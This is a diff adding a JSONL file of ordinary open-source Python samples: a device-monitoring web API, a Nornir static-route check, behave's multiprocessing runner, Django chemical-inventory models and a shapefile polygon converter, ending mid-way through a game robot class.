diff --git "a/2783.jsonl" "b/2783.jsonl" new file mode 100644--- /dev/null +++ "b/2783.jsonl" @@ -0,0 +1,680 @@ +{"seq_id":"632500814","text":"#coding=utf-8\nfrom products.netPublicModel.modelManager import ModelManager\n\nfrom products.netWebAPI.base import BaseApi, apiAccessSettings\nfrom products.netUtils import jsonUtils\nfrom products.netPublicModel.collectorClient import ColloectorCallClient\nfrom products.netHome.hostHome import HostHome\nfrom products.netPublicModel.userMessage import UserMsg\nfrom products.netModel.org.deviceClass import DeviceClass\nfrom products.netPublicModel.userControl import UserControl\nfrom products.netUtils.mcClient import availabilityCacheDecorator,\\\n getSummaryInfo_DeviceClass\nfrom products.netModel.org.location import Location\nfrom products.netUtils import xutils\nfrom products.netBilling.extendDevice import ExtendDevice\nfrom products.netPublicModel.emailTemplates import extend_device_mail_html\n\n\ndef _countDevComponents(dev, ctype, selectedComponents, user=None):\n \"\"\"\n 统计打算新增的组件数量,及已经存在的数量\n @return: int\n \"\"\"\n if not user: user = UserControl.getUser() \n \n components = getattr(dev, ctype, [])\n existUnames = [cp.uname for cp in components]\n selectedUnames = [cp.get(\"uname\") for cp in selectedComponents]\n newUnames = set(selectedUnames) - set(existUnames)\n return len(newUnames), len(components)\n\nclass MonitorApi(BaseApi):\n \n def _getDev(self, uid):\n dr = ModelManager.getMod(\"dataRoot\")\n dev = dr.findDeviceByUid(uid)\n return dev\n \n def _getMo(self, mtype, uid):\n from products.netModel.device import Device\n from products.netModel.website import Website\n \n mTypes = {\"Device\":Device, 'Website':Website}\n mcls = mTypes.get(mtype)\n return mcls._loadObj(uid)\n \n def searchDevice(self, orgType, orgUid):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n conditions = {}\n rs = org.getAllMonitorObjs(conditions=conditions)\n def updict(doc):\n return {\"title\": doc.titleOrUid(), \"cpu\": doc.getCpu(), \"mem\": doc.getMem(), \"upTime\": doc.getSysUpTime(), \"status\": doc.getStatus()}\n rs = jsonUtils.jsonDocList(rs, updict=updict)\n return rs\n \n def listDevices(self, orgType, orgUid):\n devs = self.searchDevice(orgType, orgUid)\n #return filter(lambda x: x.get(\"status\") is False, devs)\n return devs\n \n def listDevicesBaseInfo(self, orgType, orgUid, locUid=None):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n \n conditions = {}\n conditions.update({\"location\": loc._getRefInfo()})\n rs = org.getAllMonitorObjs(conditions=conditions)\n \n igs = [\"templates\", \"description\", \"objThresholds\", \"startUpIPMI\", \"ipmiConfig\", \"ownCompany\",\n \"snmpConfig\", \"lastSentBootpoCmdTime\", \"monitored\", \"commConfig\", \"collector\", \"wmiConfig\", \"deviceCls\"]\n def updict(doc):\n return {\"title\": doc.titleOrUid(), \"cpu\": doc.getCpu(), \"mem\": doc.getMem(), \"upTime\": doc.getSysUpTime(), \"status\": doc.getStatus()}\n rs = jsonUtils.jsonDocList(rs, updict=updict, ignoreProperyties= igs)\n return rs\n \n \n def listDevicesForConfigGrid(self, orgUid=None, locUid=None):\n if not orgUid or not locUid: return []\n \n org = DeviceClass._loadObj(orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n \n if not org or not loc: return []\n conditions = {}\n conditions.update({\"location\": loc._getRefInfo()})\n \n igs = [\"templates\", \"description\", 
\"objThresholds\", \"startUpIPMI\", \"ipmiConfig\", \"ownCompany\",\n \"snmpConfig\",\"monitored\", \"commConfig\", \"collector\", \"wmiConfig\", \"deviceCls\"]\n rs = org.getAllMonitorObjs(conditions=conditions)\n def updict(doc):\n return {\"title\": doc.titleOrUid()}\n rs = jsonUtils.jsonDocList(rs, updict=updict, ignoreProperyties= igs)\n return rs\n\n \n def _listDeviceComponents(self, cType, devUid):\n \"\"\"\n Fetch the configuration data of device components by sending a command\n @param cType: interface|process|fileSystem\n @return: <[]>\n \"\"\"\n defaultPluginSettings = dict(interface=\"InterfaceMap\", process=\"HRSWRunMap\", fileSystem=\"HRFileSystemMap\")\n \n dr = ModelManager.getMod(\"dataRoot\")\n dev = dr.findDeviceByUid(devUid)\n if not dev: return []\n ccClient = ColloectorCallClient(dev.collector.host)\n data = {\"uid\":dev.getUid(),\"componentType\":dev.getComponentType()}\n \n pluginSettings = dev.getPluginSettings()\n if not pluginSettings: return []\n rs = ccClient.call(pluginSettings.get(cType, defaultPluginSettings.get(cType)), vars = data)\n errMsg=rs.get(\"message\",\"\")\n if errMsg : UserMsg.warn(errMsg)\n for d in rs[\"data\"]:\n try:d[\"uname\"] = d[\"uname\"].decode(\"gb2312\")\n except: pass\n \n return rs[\"data\"]\n \n \n def listDeviceIpInterfaces(self, devUid):\n return self._listDeviceComponents(\"interface\", devUid)\n \n @apiAccessSettings(\"edit\")\n def updateDeviceIpInterfaces(self, devUid, interfaces=[]):\n \"Add or update interface configuration\"\n dev = self._getDev(devUid)\n if not dev: return \"warn:not ok, dev does not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"interfaces\", interfaces)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.interfaceCount - newCount - existCount >= 0\n# if not hasAuth:\n# return \"auth_warn:Operation failed, no more interfaces can be added\"\n dev.update_save_ipInterfaces(interfaces)\n return \"Interface configuration added or updated successfully\"\n \n def listDeviceProcesses(self, devUid):\n return self._listDeviceComponents(\"process\", devUid)\n \n @apiAccessSettings(\"edit\")\n def updateDeviceProcesses(self, devUid, processes=[]):\n \"Add or update process configuration\"\n dev = self._getDev(devUid)\n if not dev: return \"warn:not ok, dev does not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"processes\", processes)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.processCount - newCount - existCount >= 0\n# if not hasAuth: \n# return \"auth_warn:Operation failed, no more processes can be added\" \n dev.update_save_processes(processes)\n return \"Process configuration added or updated successfully\"\n \n \n def listDeviceFileSystems(self, devUid):\n return self._listDeviceComponents(\"fileSystem\", devUid)\n\n \n @apiAccessSettings(\"edit\")\n def updateDeviceFileSystems(self, devUid, fileSystems=[]):\n \"Add or update file system configuration\"\n dev = self._getDev(devUid)\n if not dev: return \"warn:not ok, dev does not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"fileSystems\", fileSystems)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.fileSystemCount - newCount - existCount >= 0\n# if not hasAuth:\n# return \"auth_warn:Operation failed, no more file systems can be added\"\n dev.update_save_fileSystems(fileSystems)\n return \"File system configuration added or updated successfully\"\n \n @apiAccessSettings(\"edit\")\n def updateDeviceIpServices(self, devUid, ipServices=[]):\n \"Add or update IP service configuration\"\n dev = self._getDev(devUid)\n if not dev: return \"warn:not ok, dev does not exist.\"\n# newCount, existCount = _countDevComponents(dev, \"ipServices\", ipServices)\n# user = UserControl.getUser()\n# lp = user.levelPolicy\n# hasAuth = lp.ipServiceCount - newCount - existCount >= 0\n# if not hasAuth:\n# return \"auth_warn:Operation failed, no more IP services can be added\"\n 
dev.update_save_ipServices(ipServices)\n return \"IP service configuration added or updated successfully\"\n \n \n \n def getDeviceClsRecentlyEvents(self, orgType, orgUid):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n if not org: return []\n conditions = {\"severity\":{\"$gte\":3}}\n evts = org.events(conditions=conditions, limit=10)\n return jsonUtils.jsonDocList(evts)\n \n \n def getDeviceClsRecentlyEventsBaseInfo(self, orgType, orgUid, locUid=None):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n moConditions={}\n moConditions.update({\"location\": loc._getRefInfo()})\n \n igs = [\"collectPointUid\", \"agent\", \"companyUid\", \"historical\",\"evtKeyId\", \"clearId\",\n \"eventClass\", \"clearKey\", \"eventState\", \"collector\"]\n if not org: return []\n conditions = {\"severity\":{\"$gte\":3}}\n evts = org.events(conditions=conditions, moConditions=moConditions, limit=10)\n return jsonUtils.jsonDocList(evts, ignoreProperyties=igs)\n \n##------------------------------------------top N------------------------------------------------------## \n @availabilityCacheDecorator\n def devicesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getHostAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n \n @availabilityCacheDecorator\n def interfacesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getNetworkAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n\n @availabilityCacheDecorator\n def processesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n \n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getProcessAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n \n @availabilityCacheDecorator\n def servicesAvailabilityTopN(self, orgType, orgUid, locUid=None, timeRange=3600):\n dr = ModelManager.getMod(\"dataRoot\")\n org = dr.loadOrgByUid(orgType, orgUid)\n loc = Location._loadObj(locUid) if locUid else Location.getDefault()\n hh = HostHome(org, loc)\n \n rs = hh.getServiceAvailabilitysTop(timeRange=timeRange)\n \n series = []\n for key, value in rs[\"rs\"].items():\n series.append(dict(name=key, data=value))\n \n return dict(series=series, categories=rs[\"strTime\"])\n \n \n##--------------------------------------------End Top N--------------------------------------------##\n @getSummaryInfo_DeviceClass\n def getSummaryInfo(self):\n \"Overall score and summary information\"\n root = DeviceClass.getRoot()\n hh = HostHome(root)\n return hh.getHostSorce()\n \n \n \n\n def getRaidInfos(self, moUid, 
moType=\"Device\"):\n raidInfos = dict(serialNo=None, productName=None,memorySize=None,\n vdsOnLineDisk=None,vdsCriticalDisks=None,vdsRebuildDisk=None,\n pdsDisks=None,pdsCriticalDisks=None,pdsFailedDisks=None)\n \n dr = ModelManager.getMod(\"dataRoot\")\n mo = dr.getMonitorObjByTypeAndUid(moUid, moType)\n if not mo: return raidInfos\n \n raidTpl = mo.getTemplate(\"ExtendTpl_SshRaidLinux\")\n if not raidTpl: return raidInfos\n \n raidInfos[\"serialNo\"] = mo.getStatusValue(raidTpl.getUid(), \"raid\", \"serialNo\")\n raidInfos[\"productName\"] = mo.getStatusValue(raidTpl.getUid(), \"raid\", \"productName\")\n raidInfos[\"memorySize\"] = mo.getStatusValue(raidTpl.getUid(), \"raid\", \"memorySize\")\n \n dptNames = [\"vdsOnLineDisk\", \"vdsCriticalDisks\", \"vdsRebuildDisk\", \"pdsDisks\", \"pdsCriticalDisks\", \"pdsFailedDisks\"]\n for name in dptNames:\n raidInfos[name] = mo.getPerfValue(raidTpl.getUid(), \"raid\", name)\n \n return raidInfos\n \n \n def getTempAndFanInfos(self, moUid, moType=\"Device\"):\n raidInfos = dict(ambientTemp=None, okFan=None,failFan=None)\n \n dr = ModelManager.getMod(\"dataRoot\")\n mo = dr.getMonitorObjByTypeAndUid(moUid, moType)\n if not mo: return raidInfos\n \n raidTpl = mo.getTemplate(\"ExtendTpl_IpmiLinux\")\n if not raidTpl: return raidInfos\n\n \n dptNames = [\"ambientTemp\", \"okFan\", \"failFan\"]\n for name in dptNames:\n raidInfos[name] = mo.getPerfValue(raidTpl.getUid(), \"ipmiTempAndFan\", name)\n \n return raidInfos\n \n\n\n def hasExtendTpl(self, moUid, tplName, moType=\"Device\"):\n dr = ModelManager.getMod(\"dataRoot\")\n mo = dr.getMonitorObjByTypeAndUid(moUid, moType)\n if not mo:return False\n \n tpl = mo.getTemplate(tplName)\n if not tpl: return False\n \n return True\n \n\n def extendDevice(self,host,website,network):\n user=UserControl.getUser()\n if not user:return \"warn:Please log in first\"\n if not xutils.isValiedNum(host):return \"warn:Host count must be a non-negative number and must not start with 0\"\n if not xutils.isValiedNum(website):return \"warn:Website count must be a non-negative number and must not start with 0\"\n if not xutils.isValiedNum(network):return \"warn:Network count must be a non-negative number and must not start with 0\"\n host=int(host)\n website=int(website)\n network=int(network)\n money_host=xutils.countMoney(host,5.0,xutils.setDiscount(host))\n money_website=xutils.countMoney(website, 5.0,xutils.setDiscount(website))\n money_network=xutils.countMoney(network, 5.0,xutils.setDiscount(network))\n money=money_host+money_website+money_network\n if int(money)==0:return \"Please select at least one device type to extend\"\n\n extendDevice=ExtendDevice()\n extendDevice.user=user\n extendDevice.deviceCount=host\n extendDevice.websiteCount=website\n extendDevice.networkCount=network\n extendDevice.money=money\n extendDevice._saveObj()\n try:\n self.extendDeviceMail(extendDevice, \"网脊 user\")\n except:\n return \"Your request has been submitted; the notification email could not be sent, but we will contact you shortly. Thank you for your support\"\n return \"Your request has been submitted; we will contact you shortly. Thank you for your support\"\n \n \n def extendDeviceMail(self,ed,st):\n subject = st + \" device extension notice\"\n message = extend_device_mail_html %{\n \"deviceCount\":ed.deviceCount,\n \"websiteCount\":ed.websiteCount,\n \"networkCount\":ed.networkCount,\n \"user\":ed.user.username,\n \"email\":ed.user.email,\n \"contactPhone\":ed.user.contactPhone,\n \"originalName\":ed.user.originalName,\n \"money\":ed.money\n }\n xutils.sendMail(subject, message, recipient_list=[ed.user.username], attachments=[]) \n","sub_path":"products/netWebAPI/monitorApi.py","file_name":"monitorApi.py","file_ext":"py","file_size_in_byte":16177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"459381313","text":"#!/usr/bin/env python3.7\n# 
-*- coding: utf-8 -*-\n\n# #############################################################################\n#\n# Import Library\n#\nfrom nornir.core import Nornir\nfrom functions.static.static_get import get_static\nfrom functions.static.static_compare import compare_static\nfrom const.constants import (\n TEST_TO_EXECUTE_FILENAME,\n PATH_TO_VERITY_FILES,\n STATIC_SRC_FILENAME,\n TEST_TO_EXC_STATIC_KEY,\n)\n\n# #############################################################################\n#\n# Constants\n#\nERROR_HEADER = \"Error import [static_run.py]\"\nHEADER = \"[static_run.py]\"\n\n\n# #############################################################################\n#\n# Functions\n#\ndef run_static(nr: Nornir, test_to_execute: dict) -> bool:\n exit_value = True\n if TEST_TO_EXC_STATIC_KEY in test_to_execute.keys():\n if test_to_execute.get(TEST_TO_EXC_STATIC_KEY).get(\"test\", False):\n get_static(nr)\n same = compare_static(\n nr=nr,\n ansible_vars=test_to_execute.get(TEST_TO_EXC_STATIC_KEY)\n .get(\"ansible_vars\")\n .get(\"enable\", False),\n dict_keys=test_to_execute.get(TEST_TO_EXC_STATIC_KEY)\n .get(\"ansible_vars\")\n .get(\"dict_keys\", False),\n your_keys=test_to_execute.get(TEST_TO_EXC_STATIC_KEY)\n .get(\"ansible_vars\")\n .get(\"your_keys\", False),\n )\n if (\n test_to_execute.get(TEST_TO_EXC_STATIC_KEY).get(\"test\", False)\n and same is False\n ):\n exit_value = False\n print(\n f\"{HEADER} Static routes defined in \"\n f\"{PATH_TO_VERITY_FILES}{STATIC_SRC_FILENAME} work = {same} !!\"\n )\n else:\n print(f\"{HEADER} Static routes have not been executed !!\")\n else:\n print(\n f\"{HEADER} Static routes key is not defined in \"\n f\"{PATH_TO_VERITY_FILES}{TEST_TO_EXECUTE_FILENAME} !!\"\n )\n\n return exit_value\n","sub_path":"functions/static/static_run.py","file_name":"static_run.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"92361703","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nThis module provides a multiprocessing Runner class.\n\"\"\"\n\nimport six\nimport os\nimport multiprocessing\n\nfrom behave.formatter._registry import make_formatters\nfrom behave.runner import Runner, Context\nfrom behave.model import Feature, Scenario, ScenarioOutline, NoMatch\nfrom behave.runner_util import parse_features, load_step_modules\nfrom behave.step_registry import registry as the_step_registry\n\nif six.PY2:\n import Queue as queue\nelse:\n import queue\n\n\nclass MultiProcRunner(Runner):\n \"\"\"Master multiprocessing runner: scans jobs and distributes to slaves\n\n This runner should not do any \"processing\" tasks, apart from scanning\n the feature files and their scenarios. 
It then spawns processing nodes\n and lets them consume the queue of tasks scheduled.\n \"\"\"\n def __init__(self, config):\n super(MultiProcRunner, self).__init__(config)\n self.jobs_map = {}\n self.jobsq = multiprocessing.JoinableQueue()\n self.resultsq = multiprocessing.Queue()\n self._reported_features = set()\n self.results_fail = False\n\n def run_with_paths(self):\n feature_locations = [filename for filename in self.feature_locations()\n if not self.config.exclude(filename)]\n self.load_hooks() # hooks themselves not used, but 'environment.py' loaded\n # step definitions are needed here for formatters only\n self.load_step_definitions()\n features = parse_features(feature_locations, language=self.config.lang)\n self.features.extend(features)\n feature_count, scenario_count = self.scan_features()\n njobs = len(self.jobs_map)\n proc_count = int(self.config.proc_count)\n print (\"INFO: {0} scenario(s) and {1} feature(s) queued for\"\n \" consideration by {2} workers. Some may be skipped if the\"\n \" -t option was given...\"\n .format(scenario_count, feature_count, proc_count))\n\n procs = []\n old_outs = self.config.outputs\n self.config.outputs = []\n old_reporters = self.config.reporters\n self.config.reporters = []\n\n for i in range(proc_count):\n client = MultiProcClientRunner(self, i)\n p = multiprocessing.Process(target=client.run)\n procs.append(p)\n p.start()\n del p\n\n print (\"INFO: started {0} workers for {1} jobs.\".format(proc_count, njobs))\n\n self.config.reporters = old_reporters\n self.formatters = make_formatters(self.config, old_outs)\n self.config.outputs = old_outs\n while (not self.jobsq.empty()):\n # 1: consume while tests are running\n self.consume_results()\n if not any([p.is_alive() for p in procs]):\n break\n\n if any([p.is_alive() for p in procs]):\n self.jobsq.join() # wait for all jobs to be processed\n print (\"INFO: all jobs have been processed\")\n\n while self.consume_results(timeout=0.1):\n # 2: remaining results\n pass\n\n # then, wait for all workers to exit:\n [p.join() for p in procs]\n\n print (\"INFO: all sub-processes have returned\")\n\n while self.consume_results(timeout=0.1):\n # 3: just in case some arrive late in the pipe\n pass\n\n for f in self.features:\n # make sure all features (including ones that have not returned)\n # are printed\n self._output_feature(f)\n\n for formatter in self.formatters:\n formatter.close()\n for reporter in self.config.reporters:\n reporter.end()\n\n return self.results_fail\n\n def scan_features(self):\n raise NotImplementedError\n\n def consume_results(self, timeout=1):\n try:\n job_id, result = self.resultsq.get(timeout=timeout)\n except queue.Empty:\n return False\n\n if job_id is None and result == 'set_fail':\n self.results_fail = True\n return True\n\n item = self.jobs_map.get(job_id)\n if item is None:\n print(\"ERROR: job_id=%x not found in master map\" % job_id)\n return True\n\n try:\n item.recv_status(result)\n if isinstance(item, Feature):\n self._output_feature(item)\n elif isinstance(item, Scenario):\n feature = item.feature\n if feature.is_finished:\n self._output_feature(feature)\n else:\n print(\"INFO: scenario finished: %x\" % (job_id,))\n except Exception as e:\n print(\"ERROR: cannot receive status for %r: %s\" % (item, e))\n if self.config.wip and not self.config.quiet:\n import traceback\n traceback.print_exc()\n return True\n\n def _output_feature(self, feature):\n if id(feature) in self._reported_features:\n return\n self._reported_features.add(id(feature))\n\n for formatter in 
self.formatters:\n formatter.uri(feature.filename)\n formatter.feature(feature)\n if feature.background:\n formatter.background(feature.background)\n for scenario in feature.scenarios:\n formatter.scenario(scenario)\n for step in scenario.steps:\n formatter.step(step)\n for step in scenario.steps:\n match = the_step_registry.find_match(step)\n if match:\n formatter.match(match)\n else:\n formatter.match(NoMatch())\n formatter.result(step)\n\n formatter.eof()\n\n for reporter in self.config.reporters:\n reporter.feature(feature)\n\n\nclass MultiProcRunner_Feature(MultiProcRunner):\n def scan_features(self):\n for feature in self.features:\n self.jobs_map[id(feature)] = feature\n self.jobsq.put(id(feature))\n for scen in feature.scenarios:\n scen.background_steps\n if isinstance(scen, ScenarioOutline):\n # compute the sub-scenarios before serializing\n for subscen in scen.scenarios:\n subscen.background_steps\n\n return len(self.jobs_map), 0\n\n\nclass MultiProcRunner_Scenario(MultiProcRunner):\n def scan_features(self):\n nfeat = nscens = 0\n def put(sth):\n idf = id(sth)\n self.jobs_map[idf] = sth\n self.jobsq.put(idf)\n\n for feature in self.features:\n if 'serial' in feature.tags:\n put(feature)\n nfeat += 1\n for scen in feature.scenarios:\n scen.background_steps\n if isinstance(scen, ScenarioOutline):\n # compute the sub-scenarios before serializing\n for subscen in scen.scenarios:\n subscen.background_steps\n continue\n for scenario in feature.scenarios:\n scenario.background_steps # compute them, before sending out\n if scenario.type == 'scenario':\n put(scenario)\n nscens += 1\n else:\n for subscenario in scenario.scenarios:\n subscenario.background_steps\n put(subscenario)\n nscens += 1\n\n return nfeat, nscens\n\n\nclass MultiProcClientRunner(Runner):\n \"\"\"Multiprocessing Client runner: picks \"jobs\" from parent queue\n\n Each client is tagged with a `num` to appear in outputs etc.\n \"\"\"\n def __init__(self, parent, num):\n super(MultiProcClientRunner, self).__init__(parent.config)\n self.num = num\n self.jobs_map = parent.jobs_map\n self.jobsq = parent.jobsq\n self.resultsq = parent.resultsq\n\n def iter_queue(self):\n \"\"\"Iterator fetching features from the queue\n\n Note that this iterator is lazy and multiprocess-affected:\n it cannot know its set of features in advance, will dynamically\n yield ones as found in the queue\n \"\"\"\n while True:\n try:\n job_id = self.jobsq.get(timeout=0.5)\n except queue.Empty:\n break\n\n job = self.jobs_map.get(job_id, None)\n if job is None:\n print(\"ERROR: missing job id=%s from map\" % job_id)\n self.jobsq.task_done()\n continue\n\n if isinstance(job, Feature):\n yield job\n try:\n self.resultsq.put((job_id, job.send_status()))\n except Exception as e:\n print(\"ERROR: cannot send result: {0}\".format(e))\n elif isinstance(job, Scenario):\n # construct a dummy feature, having only this scenario\n kwargs = {}\n for k in ('filename', 'line', 'keyword', 'name', 'tags',\n 'description', 'background', 'language'):\n kwargs[k] = getattr(job.feature, k)\n kwargs['scenarios'] = [job]\n orig_parser = job.feature.parser\n feature = Feature(**kwargs)\n feature.parser = orig_parser\n yield feature\n try:\n self.resultsq.put((job_id, job.send_status()))\n except Exception as e:\n print(\"ERROR: cannot send result: {0}\".format(e))\n else:\n raise TypeError(\"Don't know how to process: %s\" % type(job))\n self.jobsq.task_done()\n\n def run_with_paths(self):\n self.context = Context(self)\n self.load_hooks()\n self.load_step_definitions()\n 
assert not self.aborted\n\n failed = self.run_model(features=self.iter_queue())\n if failed:\n self.resultsq.put((None, 'set_fail'))\n self.resultsq.close()\n\n\n# eof\n","sub_path":"behave/runner_mp.py","file_name":"runner_mp.py","file_ext":"py","file_size_in_byte":10140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"634602621","text":"from django.db import models\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.utils.text import slugify\n# Create your models here.\n\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\nclass Chemical(models.Model):\n name = models.CharField(max_length=256)\n atomic_weight = models.DecimalField(max_digits=10,decimal_places=3)\n cas_number = models.CharField(max_length=25,unique=True)\n slug = models.SlugField(allow_unicode=True,unique=True)\n\n def __str__(self):\n return self.name\n\n def save(self,*args,**kwargs):\n self.slug = slugify(self.name)\n super().save(*args,**kwargs)\n\n def get_absolute_url(self):\n return reverse('inventory:chemicaldet',args=[self.slug])\n\n class Meta:\n ordering = ['name']\n unique_together = ('name','atomic_weight')\n\nclass Bottle(models.Model):\n chemical = models.ForeignKey(Chemical,on_delete=models.CASCADE)\n company = models.CharField(max_length=256)\n catalog_number = models.CharField(max_length=256)\n base_volume = models.DecimalField(default=0.0,max_digits=10,decimal_places=3)\n lot_number = models.CharField(max_length=256)\n price = models.DecimalField(max_digits=10,decimal_places=2)\n current_volume = models.DecimalField(default=0.0, max_digits=10,decimal_places=3)\n expiration = models.DateField(null=True,blank=True)\n recieved = models.DateField()\n recieved_by = models.ForeignKey(User,related_name='recieved_by_user',on_delete=models.CASCADE)\n date_opened = models.DateTimeField(null=True,blank=True)\n opened_by = models.ForeignKey(User,related_name='opened_by_user',blank=True,null=True, on_delete=models.CASCADE)\n date_discarded = models.DateTimeField(null=True,blank=True)\n discarded_by = models.ForeignKey(User,related_name='discarded_by_user',blank=True, null=True,on_delete=models.CASCADE)\n\n def __str__(self):\n if self.date_opened == None:\n is_opened = ['False']\n else:\n is_opened = str(self.date_opened).split()\n return self.chemical.name + \" (opened: \" + is_opened[0] + \") \" + str(self.id)\n\n def get_absolute_url(self):\n return reverse('inventory:inventoryhome')\n\n\n class Meta:\n ordering = ['chemical']\n\n\nclass Additive(models.Model):\n bottle = models.ForeignKey(Bottle,on_delete=models.CASCADE)\n concentration = models.DecimalField(max_digits=10,decimal_places=3)\n date_made = models.DateTimeField()\n made_by = models.ForeignKey(User,on_delete=models.CASCADE)\n batchid = models.CharField(max_length=256)\n filtered = models.BooleanField()\n volume = models.DecimalField(default=0.0,max_digits=10,decimal_places=3)\n # date_discarded = models.DateTimeField(null=True,blank=True)\n # discarded_by = models.ForeignKey(User,related_name='additive_discarded_by',blank=True, null=True,on_delete=models.CASCADE)\n\n def __str__(self):\n if str(self.concentration).split(\".\")[1] == '000':\n stringConcentration = str(self.concentration).split(\".\")[0]\n else:\n stringConcentration = str(self.concentration)\n stringVersion = self.bottle.chemical.name + \" (\" + stringConcentration + \" mg/ml)\"\n return stringVersion\n\n def get_absolute_url(self):\n return reverse('inventory:inventoryhome')\n\n 
class Meta:\n ordering = ['bottle','concentration']\n","sub_path":"inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"390970403","text":"\"\"\"\nFunctions for converting an input shapefile into a list of\nshapely.MultiPolygom.geoms objects.\n\"\"\"\n\nfrom shapely.geometry import shape, MultiPolygon\nfrom itertools import chain\nimport shapefile\n\n\ndef shpToGeoJSON(shp_path):\n \"\"\" Convert .shp file to GeoJSON format.\n\n @param shp_path str: path to .shp file\n @return list of dicts:\n {'ID': Unique identifier for bounding polygon,\n 'geom': shapely.MultiPolygon}\n \"\"\"\n # Read shapefile\n sf = shapefile.Reader(shp_path)\n # Find index of 'ID' field\n field_names = [field[0] for field in sf.fields[1:]]\n ID_index = field_names.index('ID')\n # Load records\n rec = sf.records()\n\n # Create list of dicts\n GeoJSON_sf = []\n for index, sr in enumerate(sf.shapeRecords()):\n GeoJSON_sf.append({'ID': rec[index][ID_index],\n 'geom': MultiPolygon([shape(sr.\n shape.__geo_interface__)])})\n return GeoJSON_sf\n\n\ndef _gen_polys(row):\n \"\"\"\n Takes an admin wkt row and yields polygons with gubid set.\n\n It splits multipolygons into constituent polygons with the same GUBID,\n but assigns them each a unique uid.\n\n @param row dict: {'geom': MultiPolygon, 'GUBID': uid}\n @yield Polygon with GUBID attribute set.\n \"\"\"\n multipoly = row['geom']\n for i, poly in enumerate(multipoly.geoms):\n setattr(poly, 'gubid', row['ID'])\n setattr(poly, 'uid', '{}_{}'.format(row['ID'], i))\n yield poly\n\n\ndef geoJSON_to_polys(geoJSON_list):\n \"\"\"\n Converts geoJSON list to a list of shapely Polygon objects.\n\n These polygons are the consituent polygons for the admin regions, each with\n the GUBID of the admin region, and an id unique to the polygon.\n\n @param admin_data [{}]: List of {'ID': str,\n 'geom': shapely.geometry.polygon}.\n @return [Polygon]: Polygons with gubid and uid attributes.\n \"\"\"\n # collect the iterable into a list\n polys = list(\n # chain.from_iterable \"flattens\" the iterable of iterables of Polygons\n # to just an iterable of Polygons\n chain.from_iterable(\n # _gen_polys produces an iterable of Polygons, so this will be an\n # iterable of iterables of Polygons.\n map(_gen_polys, geoJSON_list)\n ))\n return polys\n\n\ndef shp_to_polys(shp_path):\n \"\"\" Convert .shp to list of shapely Polygon objects.\"\"\"\n geoJSON_list = shpToGeoJSON(shp_path)\n return geoJSON_to_polys(geoJSON_list)\n","sub_path":"utils/polycreation.py","file_name":"polycreation.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328109529","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nfrom okc_robot.data import UserData\nfrom okc_robot.protocol import Protocol\nfrom okc_robot.data import game_table\nfrom okc_robot.net import Response\nfrom config import conf_path\n\nimport logging\nimport random\n\n\nclass User(object):\n\t\n\tdef __init__(self, user_data: UserData, protocol: Protocol):\n\t\tself.__data = user_data\n\t\tself.__sid = self.__data.svr_player.sid\n\t\tself.__uid = self.__data.svr_player.uid\n\t\tself.__ksid = self.__data.svr_player.ksid\n\t\tself.__request = protocol\n\t\n\tdef player_name_change(self, name=\"\") -> Response:\n\t\tif name == \"\":\n\t\t\tname = str(self.__uid)\n\t\telse:\n\t\t\tname = \"%s%s\" % (self.__uid, 
